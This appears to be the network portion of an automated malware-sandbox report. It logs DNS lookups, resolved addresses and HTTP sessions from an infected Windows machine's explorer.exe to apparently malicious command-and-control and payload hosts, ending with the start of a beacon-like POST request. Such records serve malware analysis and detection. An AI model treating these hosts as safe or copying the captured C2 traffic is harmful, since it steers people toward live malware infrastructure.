                                                                                                                                                        Dec 28, 2021 03:23:26.845761061 CET192.168.2.38.8.8.80xd0d8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:48.158132076 CET192.168.2.38.8.8.80x96dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:48.372364998 CET192.168.2.38.8.8.80xb0edStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:48.633774996 CET192.168.2.38.8.8.80xbbceStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:49.635706902 CET192.168.2.38.8.8.80x5284Standard query (0)patmushta.infoA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:50.520814896 CET192.168.2.38.8.8.80xcdabStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:50.732245922 CET192.168.2.38.8.8.80xb6a4Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:50.947036982 CET192.168.2.38.8.8.80xdebbStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:51.180335999 CET192.168.2.38.8.8.80x7a42Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:51.396169901 CET192.168.2.38.8.8.80x8f93Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:51.656483889 CET192.168.2.38.8.8.80x9dfaStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:51.873634100 CET192.168.2.38.8.8.80x5c3bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:52.162717104 CET192.168.2.38.8.8.80x3748Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:52.369967937 CET192.168.2.38.8.8.80x7e5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:55.018826962 CET192.168.2.38.8.8.80x9aa2Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:55.251041889 CET192.168.2.38.8.8.80xd8c8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:55.505115032 CET192.168.2.38.8.8.80x61edStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:55.717533112 CET192.168.2.38.8.8.80x36aeStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:56.291511059 CET192.168.2.38.8.8.80xc9a9Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:58.016827106 CET192.168.2.38.8.8.80x742aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:58.316298962 CET192.168.2.38.8.8.80x7c9eStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:58.533104897 CET192.168.2.38.8.8.80x7122Standard query (0)bitbucket.orgA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:59.141510963 CET192.168.2.38.8.8.80x49e6Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:02.442754984 CET192.168.2.38.8.8.80x4321Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:02.654723883 CET192.168.2.38.8.8.80xda70Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:02.899924040 CET192.168.2.38.8.8.80x3557Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:03.112284899 CET192.168.2.38.8.8.80x693Standard query (0)bitbucket.orgA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:03.637275934 CET192.168.2.38.8.8.80xbed9Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:05.919442892 CET192.168.2.38.8.8.80x4bf0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:05.985217094 CET192.168.2.38.8.8.80x161eStandard query (0)bitbucket.orgA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:06.131762028 CET192.168.2.38.8.8.80x1e6eStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:06.377129078 CET192.168.2.38.8.8.80xdac4Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:06.538320065 CET192.168.2.38.8.8.80xa85bStandard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:06.570647955 CET192.168.2.38.8.8.80x3846Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:07.583118916 CET192.168.2.38.8.8.80x3846Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:08.723823071 CET192.168.2.38.8.8.80x9bffStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:09.067429066 CET192.168.2.38.8.8.80x16fbStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:09.304661989 CET192.168.2.38.8.8.80x597dStandard query (0)downloafilesaccess.ddns.netA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:09.873713017 CET192.168.2.38.8.8.80xf81fStandard query (0)elew3le3lanle.freeddns.orgA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:10.251799107 CET192.168.2.38.8.8.80x7ca1Standard query (0)bitbucket.orgA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:10.797369957 CET192.168.2.38.8.8.80x6817Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:10.820465088 CET192.168.2.38.8.8.80x8e3eStandard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:11.167680025 CET192.168.2.38.8.8.80xa8baStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:17.069612026 CET192.168.2.38.8.8.80x7824Standard query (0)f0613918.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:24.563666105 CET192.168.2.38.8.8.80x3c59Standard query (0)kent0mushinec0n3t.casacam.netA (IP address)IN (0x0001)

                                                                                                                                                        DNS Answers

                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                        Dec 28, 2021 03:22:55.169572115 CET8.8.8.8192.168.2.30x191No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:22:55.699743986 CET8.8.8.8192.168.2.30x1ab8No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:22:56.204132080 CET8.8.8.8192.168.2.30x14d8No error (0)privacytools-foryou-777.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:22:58.383040905 CET8.8.8.8192.168.2.30x3e6bNo error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:22:58.926264048 CET8.8.8.8192.168.2.30x7c97No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:22:59.242784023 CET8.8.8.8192.168.2.30x5c4bNo error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:22:59.461976051 CET8.8.8.8192.168.2.30xb751No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:22:59.702646971 CET8.8.8.8192.168.2.30x4edfNo error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:22:59.915798903 CET8.8.8.8192.168.2.30x1ec0No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:01.470591068 CET8.8.8.8192.168.2.30xcd02No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:01.711071968 CET8.8.8.8192.168.2.30xed45No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:02.531599998 CET8.8.8.8192.168.2.30x669No error (0)data-host-coin-8.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:02.725339890 CET8.8.8.8192.168.2.30x382No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:02.944960117 CET8.8.8.8192.168.2.30x2732No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:11.172437906 CET8.8.8.8192.168.2.30x8de7No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:11.462960958 CET8.8.8.8192.168.2.30xc23eNo error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:11.683669090 CET8.8.8.8192.168.2.30x7b85No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:12.011408091 CET8.8.8.8192.168.2.30xc31eNo error (0)unicupload.top54.38.220.85A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:12.075032949 CET8.8.8.8192.168.2.30xbeaeNo error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:12.320799112 CET8.8.8.8192.168.2.30xcfa9No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:12.549226046 CET8.8.8.8192.168.2.30x4378No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:14.771740913 CET8.8.8.8192.168.2.30x1237Server failure (2)infinity-cheats.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:14.813018084 CET8.8.8.8192.168.2.30x6edeNo error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:15.025496006 CET8.8.8.8192.168.2.30x559dNo error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:15.507180929 CET8.8.8.8192.168.2.30xc570No error (0)data-host-coin-8.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:15.783905029 CET8.8.8.8192.168.2.30x1237Server failure (2)infinity-cheats.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:17.519603014 CET8.8.8.8192.168.2.30x58d3No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:17.741137028 CET8.8.8.8192.168.2.30xccb0No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:17.947475910 CET8.8.8.8192.168.2.30x32a9No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:18.157324076 CET8.8.8.8192.168.2.30xef62No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:20.486973047 CET8.8.8.8192.168.2.30xb78bNo error (0)file-file-host4.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:21.749067068 CET8.8.8.8192.168.2.30x1742No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:22.474263906 CET8.8.8.8192.168.2.30x2a43No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:23.374758959 CET8.8.8.8192.168.2.30x3227No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:24.076189995 CET8.8.8.8192.168.2.30x7aacNo error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:24.339793921 CET8.8.8.8192.168.2.30x9f5cNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:24.339793921 CET8.8.8.8192.168.2.30x9f5cNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:24.339793921 CET8.8.8.8192.168.2.30x9f5cNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:24.339793921 CET8.8.8.8192.168.2.30x9f5cNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:24.339793921 CET8.8.8.8192.168.2.30x9f5cNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:26.372894049 CET8.8.8.8192.168.2.30xee96No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:26.653476954 CET8.8.8.8192.168.2.30x9aeNo error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:26.862257957 CET8.8.8.8192.168.2.30xd0d8No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:48.176949978 CET8.8.8.8192.168.2.30x96dNo error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:48.391206980 CET8.8.8.8192.168.2.30xb0edNo error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:48.652209997 CET8.8.8.8192.168.2.30xbbceNo error (0)data-host-coin-8.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:49.947416067 CET8.8.8.8192.168.2.30x5284No error (0)patmushta.info47.251.38.135A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:50.538045883 CET8.8.8.8192.168.2.30xcdabNo error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:50.750871897 CET8.8.8.8192.168.2.30xb6a4No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:50.965013027 CET8.8.8.8192.168.2.30xdebbNo error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:51.199176073 CET8.8.8.8192.168.2.30x7a42No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:51.413188934 CET8.8.8.8192.168.2.30x8f93No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:51.673461914 CET8.8.8.8192.168.2.30x9dfaNo error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:51.890630007 CET8.8.8.8192.168.2.30x5c3bNo error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:52.179511070 CET8.8.8.8192.168.2.30x3748No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:52.386827946 CET8.8.8.8192.168.2.30x7e5No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:55.037125111 CET8.8.8.8192.168.2.30x9aa2No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:55.269539118 CET8.8.8.8192.168.2.30xd8c8No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:55.521550894 CET8.8.8.8192.168.2.30x61edNo error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:56.078768969 CET8.8.8.8192.168.2.30x36aeNo error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:56.309621096 CET8.8.8.8192.168.2.30xc9a9No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:58.035552025 CET8.8.8.8192.168.2.30x742aNo error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:58.335232973 CET8.8.8.8192.168.2.30x7c9eNo error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:58.552124023 CET8.8.8.8192.168.2.30x7122No error (0)bitbucket.org104.192.141.1A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:59.158548117 CET8.8.8.8192.168.2.30x49e6No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:59.158548117 CET8.8.8.8192.168.2.30x49e6No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:59.158548117 CET8.8.8.8192.168.2.30x49e6No error (0)s3-w.us-east-1.amazonaws.com52.216.132.51A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:02.459752083 CET8.8.8.8192.168.2.30x4321No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:02.673703909 CET8.8.8.8192.168.2.30xda70No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:02.918525934 CET8.8.8.8192.168.2.30x3557No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:03.132446051 CET8.8.8.8192.168.2.30x693No error (0)bitbucket.org104.192.141.1A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:03.657280922 CET8.8.8.8192.168.2.30xbed9No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:03.657280922 CET8.8.8.8192.168.2.30xbed9No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:03.657280922 CET8.8.8.8192.168.2.30xbed9No error (0)s3-w.us-east-1.amazonaws.com52.217.141.225A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:05.938266039 CET8.8.8.8192.168.2.30x4bf0No error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:06.002180099 CET8.8.8.8192.168.2.30x161eNo error (0)bitbucket.org104.192.141.1A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:06.148346901 CET8.8.8.8192.168.2.30x1e6eNo error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:06.396037102 CET8.8.8.8192.168.2.30xdac4No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:06.396037102 CET8.8.8.8192.168.2.30xdac4No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:06.396037102 CET8.8.8.8192.168.2.30xdac4No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:06.396037102 CET8.8.8.8192.168.2.30xdac4No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:06.396037102 CET8.8.8.8192.168.2.30xdac4No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:06.563693047 CET8.8.8.8192.168.2.30xa85bNo error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:06.563693047 CET8.8.8.8192.168.2.30xa85bNo error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:06.563693047 CET8.8.8.8192.168.2.30xa85bNo error (0)s3-w.us-east-1.amazonaws.com52.217.49.116A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:07.602219105 CET8.8.8.8192.168.2.30x3846No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:07.602219105 CET8.8.8.8192.168.2.30x3846No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:07.602219105 CET8.8.8.8192.168.2.30x3846No error (0)s3-w.us-east-1.amazonaws.com52.216.27.156A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:08.743004084 CET8.8.8.8192.168.2.30x9bffNo error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:09.086241007 CET8.8.8.8192.168.2.30x16fbNo error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:09.325010061 CET8.8.8.8192.168.2.30x597dNo error (0)downloafilesaccess.ddns.net155.248.231.246A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:10.048386097 CET8.8.8.8192.168.2.30xf81fNo error (0)elew3le3lanle.freeddns.org178.238.8.177A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:10.272886992 CET8.8.8.8192.168.2.30x7ca1No error (0)bitbucket.org104.192.141.1A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:10.816524982 CET8.8.8.8192.168.2.30x6817No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:10.816524982 CET8.8.8.8192.168.2.30x6817No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:10.816524982 CET8.8.8.8192.168.2.30x6817No error (0)s3-w.us-east-1.amazonaws.com52.217.95.193A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:10.837451935 CET8.8.8.8192.168.2.30x8e3eNo error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:10.837451935 CET8.8.8.8192.168.2.30x8e3eNo error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:10.837451935 CET8.8.8.8192.168.2.30x8e3eNo error (0)s3-w.us-east-1.amazonaws.com52.217.15.180A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:11.184557915 CET8.8.8.8192.168.2.30xa8baNo error (0)host-data-coin-11.com5.188.89.48A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:17.097075939 CET8.8.8.8192.168.2.30x7824No error (0)f0613918.xsph.ru141.8.192.151A (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:24:24.733727932 CET8.8.8.8192.168.2.30x3c59No error (0)kent0mushinec0n3t.casacam.net178.238.8.177A (IP address)IN (0x0001)

                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                        • cdn.discordapp.com
                                                                                                                                                        • transfer.sh
                                                                                                                                                        • bitbucket.org
                                                                                                                                                        • bbuseruploads.s3.amazonaws.com
                                                                                                                                                        • downloafilesaccess.ddns.net
                                                                                                                                                        • edrbthhhm.net
                                                                                                                                                          • host-data-coin-11.com
                                                                                                                                                        • iqsorlppj.org
                                                                                                                                                        • privacytools-foryou-777.com
                                                                                                                                                        • ynjhvuqfxb.net
                                                                                                                                                        • ltxeprficx.org
                                                                                                                                                        • ggafm.com
                                                                                                                                                        • ruicmqoob.net
                                                                                                                                                        • fsddvkyhh.com
                                                                                                                                                        • ivcrcx.org
                                                                                                                                                        • hewpcmebv.com
                                                                                                                                                        • ypnfj.org
                                                                                                                                                        • data-host-coin-8.com
                                                                                                                                                        • xrbnvbr.com
                                                                                                                                                        • tckdyenm.org
                                                                                                                                                        • iiojucb.net
                                                                                                                                                        • igeku.org
                                                                                                                                                        • iuyeipw.net
                                                                                                                                                        • unicupload.top
                                                                                                                                                        • xuifp.org
                                                                                                                                                        • afxqeyx.com
                                                                                                                                                        • hwpbyl.org
                                                                                                                                                        • lbhapead.com
                                                                                                                                                        • gvmtgcjw.org
                                                                                                                                                        • ylridfpsql.org
                                                                                                                                                        • hxktrih.org
                                                                                                                                                        • plxyaqocf.org
                                                                                                                                                        • kpbmili.com
                                                                                                                                                        • 185.7.214.171:8080
                                                                                                                                                        • file-file-host4.com
                                                                                                                                                        • ucoqtvyd.org
                                                                                                                                                        • pvmkcaiq.com
                                                                                                                                                        • brlvnaq.net
                                                                                                                                                        • chmbugnp.org
                                                                                                                                                        • qnhrcwsu.com
                                                                                                                                                        • jiwvmdi.com
                                                                                                                                                        • xippeeyeyr.com
                                                                                                                                                        • bfseu.org
                                                                                                                                                        • mrlefqqc.com
                                                                                                                                                        • yqndvhfvew.org
                                                                                                                                                        • prmhflof.org
                                                                                                                                                        • risngapv.org
                                                                                                                                                        • ujyivo.org
                                                                                                                                                        • jmtkjkpl.com
                                                                                                                                                        • fxnyg.org
                                                                                                                                                        • moteqo.com
                                                                                                                                                        • kuwxcr.com
                                                                                                                                                        • itvtw.net
                                                                                                                                                        • 91.243.44.128
                                                                                                                                                        • bkepfdarq.org
                                                                                                                                                        • qqnjujtc.org
                                                                                                                                                        • wjossdwse.org
                                                                                                                                                        • pwwyvihpo.net
                                                                                                                                                        • veitjk.net
                                                                                                                                                        • htkfphhu.net
                                                                                                                                                        • uhsewixtmk.com
                                                                                                                                                        • cpvpnqem.com
                                                                                                                                                        • davmsaybuv.com
                                                                                                                                                        • upfuvgjpoj.org
                                                                                                                                                        • pauhpwmqnp.net
                                                                                                                                                        • lhtwdpi.net
                                                                                                                                                        • cykpq.net
                                                                                                                                                        • qeboy.org

                                                                                                                                                        HTTP Packets

                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        0192.168.2.349819162.159.135.233443C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        1192.168.2.349850144.76.136.153443C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        10192.168.2.349882104.192.141.1443C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        11192.168.2.3497455.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:22:55.236404896 CET1021OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://edrbthhhm.net/
